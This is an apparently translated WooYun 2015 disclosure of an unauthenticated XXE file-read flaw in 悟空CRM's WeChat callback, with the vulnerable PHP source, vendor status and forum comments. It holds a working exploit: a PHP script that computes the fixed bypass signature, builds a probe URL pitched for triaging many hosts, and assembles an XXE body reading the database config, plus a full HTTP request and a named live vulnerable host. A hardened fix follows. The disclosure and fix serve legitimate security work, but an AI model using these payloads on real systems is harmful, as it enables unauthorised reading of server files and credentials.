
Vulnerability Summary (followers: 9)

Defect ID: WooYun-2015-135088

Title: Arbitrary file read in 悟空CRM (no login required)

Vendor: 郑州卡卡罗特软件科技有限公司

Author: 1c3z

Submitted: 2015-08-18 20:32

Published: 2015-11-21 20:35

Type: Arbitrary file traversal/download

Severity: High

Self-assessed Rank: 15

Status: Vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact help@wooyun.org

Tags: Arbitrary file read



Vulnerability Details

Disclosure status:

2015-08-18: Details sent to the vendor, awaiting vendor response
2015-08-23: Vendor actively ignored the vulnerability; details opened to third-party security partners (绿盟科技, 唐朝安全巡航, 无声信息)
2015-10-17: Details opened to core white hats and domain experts
2015-10-27: Details opened to regular white hats
2015-11-06: Details opened to intern white hats
2015-11-21: Details opened to the public

Brief description:

XXE in the WeChat (weixin) callback endpoint, reachable without authentication, giving arbitrary file read.

Details:

Version tested:

http://**.**.**.**/Uploads/v0.5.1.zip



Code:
//App\Lib\Action\WeixinAction.class.php
private function checkSignature() {
$signature = $_GET["signature"];
// timestamp and nonce are read straight from the query string; when absent they are null
$timestamp = $_GET["timestamp"];
$nonce = $_GET["nonce"];
$echostr = $_GET["echostr"];

$token = $this->_token;

// WeChat-style check: sort token/timestamp/nonce, concatenate, sha1.
// With an empty token and no timestamp/nonce this is sha1("") on every request.
$tmpArr = array($token, $timestamp, $nonce);
sort($tmpArr);
$tmpStr = implode( $tmpArr );
$tmpStr = sha1( $tmpStr );

// echostr branch: on a matching signature the server echoes echostr back and stops
if( $tmpStr == $signature && $echostr != ""){
echo $echostr;
die();
}elseif( $tmpStr == $signature){
return true;
}else{
return false;
}
}

public function _initialize(){
// the token comes from the stored WeChat config; on an install that never set up WeChat it is empty
$weixin = M('Config')->where('name = "weixin"')->getField('value');
$weixin_config = unserialize($weixin);
$this->_token = $weixin_config['WEIXIN_TOKEN'];
$this->bd_url = $weixin_config['WEIXIN_BD_URL'];
if(!$this->checkSignature()){
echo 'illegal origin';
exit;
}
// the raw POST body goes straight into simplexml_load_string; nothing disables
// external entity loading, so a SYSTEM entity declared in the body is resolved
$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
$this->_post = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);

}
// rest of the file omitted



checkSignature() does perform a check, but WEIXIN_TOKEN is empty by default and most deployments never configure the WeChat feature at all. Because _initialize() runs before every action of the weixin module, the check is the only thing standing between an anonymous request and simplexml_load_string().

With an empty token, and with the timestamp and nonce parameters simply omitted from the query string, the array being hashed is three empty values, so the expected signature is sha1("") = da39a3ee5e6b4b0d3255bfef95601890afd80709 on every such install. Supplying that value as signature passes the check. (Even if timestamp and nonce were supplied, an empty token means the attacker knows every input to the hash and can compute the signature anyway.)
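To make the bypass concrete, here is an added example written for this write-up (not code from 悟空CRM): a standalone PHP script that reimplements the checkSignature() arithmetic, derives the constant signature, builds a non-intrusive probe that uses the echostr branch to confirm an empty token without sending any XML, and assembles the XXE request body from the report. The host http://target.example and the probe string are placeholders.

```php
<?php
// Added example for this write-up, not code from 悟空CRM. Reproduces the
// checkSignature() arithmetic to show why one fixed value passes on every
// install where WEIXIN_TOKEN was never set. Target host is a placeholder.

// Mirror of the vulnerable computation: sort(token, timestamp, nonce),
// concatenate, sha1. Missing GET parameters arrive here as null, exactly as
// $_GET["timestamp"] does in the original when the parameter is absent.
function wukong_signature(string $token, ?string $timestamp, ?string $nonce): string
{
    $tmpArr = [$token, $timestamp, $nonce];
    sort($tmpArr);
    return sha1(implode('', $tmpArr));
}

// Non-intrusive probe: the echostr branch of checkSignature() echoes the
// supplied value back (and dies) when the signature matches, so a response
// body equal to the probe string confirms an empty token with no XML sent.
function probe_url(string $base): string
{
    $q = http_build_query([
        'm'         => 'weixin',
        'a'         => 'index',
        'signature' => wukong_signature('', null, null),
        'echostr'   => 'wooyun-probe',   // placeholder marker
    ]);
    return $base . '/index.php?' . $q;
}

// Request body from the report, parameterised on the file to read. The
// php://filter wrapper base64-encodes the file so its contents survive XML
// parsing and come back inside <ToUserName>.
function xxe_body(string $resource): string
{
    return '<?xml version="1.0" encoding="utf-8"?>' . "\n"
        . '<!DOCTYPE copyright [' . "\n"
        . '<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=' . $resource . '">' . "\n"
        . ']>' . "\n"
        . '<xml><ToUserName>&test;</ToUserName><MsgType>event</MsgType><Event>subscribe</Event></xml>';
}

$bypass = wukong_signature('', null, null);
echo "empty token, no timestamp/nonce -> $bypass\n";
echo "equals sha1(''): " . var_export($bypass === sha1(''), true) . "\n";
// The attacker controls timestamp and nonce as well, so with an empty token the
// signature is always computable; the fixed value above is just the simplest.
echo "empty token, ts=1, nonce=x   -> " . wukong_signature('', '1', 'x') . "\n";
echo "probe: " . probe_url('http://target.example') . "\n";
echo "body:\n" . xxe_body('App/Conf/db.php') . "\n";
```

Run it with `php` on the command line; the first line printed is the signature used throughout this report. The probe URL is the cheapest way to triage a large list of hosts, since an echoed probe string already proves the token is empty before any file is read.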



Local test:

POST directly:

Code:
POST /wukongcrm/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Host: **.**.**.**
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/43.0.2357.130 Chrome/43.0.2357.130 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Content-Length: 259

<?xml version="1.0" encoding="utf-8"?>

<!DOCTYPE copyright [

<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=App/Conf/db.php">
]>
<xml>
<ToUserName>&test;</ToUserName>
<MsgType>event</MsgType>
<Event>subscribe</Event>
</xml>





[Screenshot: 选区_178.png]

Base64 decode:

[Screenshot: 选区_179.png]

Other cases:

[Screenshot: 选区_180.png]

[Screenshot: 选区_181.png]

[Screenshot: 选区_183.png]

Proof of vulnerability:

All of the endpoints below were tested and are vulnerable to XXE. The masked URL appeared 33 times in the original, once per affected host; it is listed once here.

http://**.**.**.**/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

http://www.wxin.top/index.php?m=weixin&a=index&signature=da39a3ee5e6b4b0d3255bfef95601890afd80709

Fix:

Reference:

http://**.**.**.**/web:xxe-attack

In short: refuse every request to the weixin endpoint while WEIXIN_TOKEN is empty, compare the signature with a constant-time comparison rather than ==, and parse the POST body with external entity loading disabled, or simply reject any body containing a DOCTYPE, since a legitimate WeChat push message has no need for one.
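As an added example (this is not the vendor's patch; the function names, the 300-second skew window and the sample token are this write-up's own choices), a hardened drop-in for the two weak spots in WeixinAction: the signature check and the XML parse.

```php
<?php
// Added example for this write-up, not code from 悟空CRM. Hardened versions of
// WeixinAction::checkSignature() and the simplexml_load_string() call in
// _initialize(). Names and the skew window are the write-up's own choices.

const SIGNATURE_MAX_SKEW = 300; // seconds; assumed freshness window

// Returns true only for a request whose signature was computed over a
// non-empty configured token with a fresh timestamp.
function verify_weixin_signature(string $token, array $query, ?int $now = null): bool
{
    // 1. Empty token means the feature was never configured: refuse everything
    //    instead of accepting sha1("") (the bypass in this report).
    if ($token === '') {
        return false;
    }
    // 2. All three inputs must be present; a missing one must not silently
    //    become "" the way an absent $_GET["timestamp"] does in the original.
    foreach (['signature', 'timestamp', 'nonce'] as $k) {
        if (!isset($query[$k]) || !is_string($query[$k]) || $query[$k] === '') {
            return false;
        }
    }
    // 3. Reject replayed or far-off timestamps.
    $ts = $query['timestamp'];
    if (!ctype_digit($ts) || abs(($now ?? time()) - (int) $ts) > SIGNATURE_MAX_SKEW) {
        return false;
    }
    // Dictionary order, as the WeChat API specifies, then sha1 of the concatenation.
    $tmpArr = [$token, $ts, $query['nonce']];
    sort($tmpArr, SORT_STRING);
    $expected = sha1(implode('', $tmpArr));
    // 4. Constant-time comparison instead of the loose == in the original.
    return hash_equals($expected, $query['signature']);
}

// Parses an incoming WeChat message body without resolving any entity.
function parse_weixin_message(string $body): ?SimpleXMLElement
{
    // A SYSTEM entity can only be declared inside a DTD, and a WeChat push
    // message carries none, so any DOCTYPE is rejected outright.
    if (preg_match('/<!DOCTYPE/i', $body) || preg_match('/<!ENTITY/i', $body)) {
        return null;
    }
    if (PHP_VERSION_ID < 80000) {
        // Older PHP: stop libxml from fetching external entities at all.
        libxml_disable_entity_loader(true);
    }
    libxml_use_internal_errors(true);
    // No LIBXML_NOENT (which would substitute entities); LIBXML_NONET blocks
    // network fetches from inside the parser as a second layer.
    $xml = simplexml_load_string($body, 'SimpleXMLElement', LIBXML_NOCDATA | LIBXML_NONET);
    return $xml === false ? null : $xml;
}

// Demonstration on constructed inputs.
$xxe = '<?xml version="1.0"?>'
     . '<!DOCTYPE x [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=App/Conf/db.php">]>'
     . '<xml><ToUserName>&test;</ToUserName></xml>';
echo "XXE body rejected: " . var_export(parse_weixin_message($xxe) === null, true) . "\n";

$benign = '<xml><ToUserName><![CDATA[gh_123]]></ToUserName><MsgType><![CDATA[event]]></MsgType></xml>';
echo "benign MsgType: " . parse_weixin_message($benign)->MsgType . "\n";

$token = 's3cret'; $ts = '1700000000'; $nonce = 'abc';   // sample values
$arr = [$token, $ts, $nonce];
sort($arr, SORT_STRING);
$good = sha1(implode('', $arr));
echo "bypass value accepted:  " . var_export(
    verify_weixin_signature('', ['signature' => sha1('')], 1700000000), true) . "\n";
echo "valid request accepted: " . var_export(
    verify_weixin_signature($token, ['signature' => $good, 'timestamp' => $ts, 'nonce' => $nonce], 1700000010), true) . "\n";
echo "stale request accepted: " . var_export(
    verify_weixin_signature($token, ['signature' => $good, 'timestamp' => $ts, 'nonce' => $nonce], 1700001000), true) . "\n";
```

The DOCTYPE rejection is the control that actually matters here: LIBXML_NONET only stops network retrieval, and php://filter reads a local file, so relying on NONET alone would still leave this report's payload working on a libxml build that substitutes entities.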

Copyright notice: when reposting, credit the source: 1c3z@乌云


Vendor Response

Vendor reply:

Severity: No impact; vendor ignored

Ignored at: 2015-11-21 20:35

Vendor comment:

Vulnerability Rank: 15 (WooYun rating)

Latest status:

None


Comments

  1. 2015-08-19 09:43 | 染血の雪 ( Regular White Hat | Rank:247 Bugs:36 | Whether you dig or not, the bugs are right there, they won't increase, won't... )
    0

    What a badass company name~ Super Saiyan, are you scared?

  2. 2015-08-21 07:30 | Elliott ( Intern White Hat | Rank:48 Bugs:11 | Absolutely never going to be a programmer )
    0

    Are .NET bugs easy to find?

  3. 2015-08-21 09:46 | 1c3z ( Regular White Hat | Rank:297 Bugs:63 | @)!^)
    0

    @Elliott That one is written in PHP. .NET bugs really are hard to find.

  4. 2015-08-21 11:04 | Elliott ( Intern White Hat | Rank:48 Bugs:11 | Absolutely never going to be a programmer )
    0

    Super Saiyan, are you scared?

  5. 2015-11-21 22:04 | BeenQuiver ( Regular White Hat | Rank:103 Bugs:27 | Focused and efficient; stick to good habits and never give up )
    0

    666
